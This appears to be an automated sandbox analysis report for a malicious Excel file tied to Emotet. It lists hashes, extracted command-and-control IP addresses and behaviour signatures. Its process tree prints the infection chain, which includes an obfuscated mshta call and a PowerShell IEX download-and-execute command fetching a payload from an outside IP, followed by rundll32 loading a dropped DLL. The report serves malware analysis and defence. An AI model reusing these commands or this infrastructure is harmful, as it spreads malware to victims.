Analysis
-
max time kernel
121s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 23:04
Behavioral task
behavioral1
Sample
f74964dbb9ba817e9acbccfc6c081eee34f21cb4d1942c7aafe8ecc867761917.xls
Resource
win10-en-20211208
General
-
Target
f74964dbb9ba817e9acbccfc6c081eee34f21cb4d1942c7aafe8ecc867761917.xls
-
Size
141KB
-
MD5
52c71979386ac643247d9d73585dba55
-
SHA1
42822423168d51c2ff0a9c939fa139c29add0de7
-
SHA256
f74964dbb9ba817e9acbccfc6c081eee34f21cb4d1942c7aafe8ecc867761917
-
SHA512
26744f67592a65554601bfbc28256b2efd611ccfccf3798a8825e0e808728f799e26a639c3d651fd8bf74a105bc4b4746c7f3a317ade95a7807f6ca0eb841018
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Extracted
http://185.7.214.7/fer/fer.png
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2276 3808 cmd.exe 68 -
Blocklisted process makes network request 5 IoCs
flow pid Process 37 1056 mshta.exe 39 3752 powershell.exe 41 3752 powershell.exe 43 3752 powershell.exe 52 1480 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 4076 rundll32.exe 1192 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Stfbkuaqtnti\yffjkcgypv.cvy rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 700 1056 WerFault.exe 75 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3808 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 700 WerFault.exe 1480 rundll32.exe 1480 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3752 powershell.exe Token: SeDebugPrivilege 700 WerFault.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE 3808 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3808 wrote to memory of 1748 3808 EXCEL.EXE 72 PID 3808 wrote to memory of 1748 3808 EXCEL.EXE 72 PID 3808 wrote to memory of 2276 3808 EXCEL.EXE 73 PID 3808 wrote to memory of 2276 3808 EXCEL.EXE 73 PID 2276 wrote to memory of 1056 2276 cmd.exe 75 PID 2276 wrote to memory of 1056 2276 cmd.exe 75 PID 1056 wrote to memory of 3752 1056 mshta.exe 76 PID 1056 wrote to memory of 3752 1056 mshta.exe 76 PID 3752 wrote to memory of 1164 3752 powershell.exe 80 PID 3752 wrote to memory of 1164 3752 powershell.exe 80 PID 1164 wrote to memory of 4076 1164 cmd.exe 81 PID 1164 wrote to memory of 4076 1164 cmd.exe 81 PID 1164 wrote to memory of 4076 1164 cmd.exe 81 PID 4076 wrote to memory of 1192 4076 rundll32.exe 82 PID 4076 wrote to memory of 1192 4076 rundll32.exe 82 PID 4076 wrote to memory of 1192 4076 rundll32.exe 82 PID 1192 wrote to memory of 3732 1192 rundll32.exe 85 PID 1192 wrote to memory of 3732 1192 rundll32.exe 85 PID 1192 wrote to memory of 3732 1192 rundll32.exe 85 PID 3732 wrote to memory of 1480 3732 rundll32.exe 86 PID 3732 wrote to memory of 1480 3732 rundll32.exe 86 PID 3732 wrote to memory of 1480 3732 rundll32.exe 86
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f74964dbb9ba817e9acbccfc6c081eee34f21cb4d1942c7aafe8ecc867761917.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1748
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Stfbkuaqtnti\yffjkcgypv.cvy",DtiTgCCegkWR8⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Stfbkuaqtnti\yffjkcgypv.cvy",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1480
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1056 -s 19564⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
-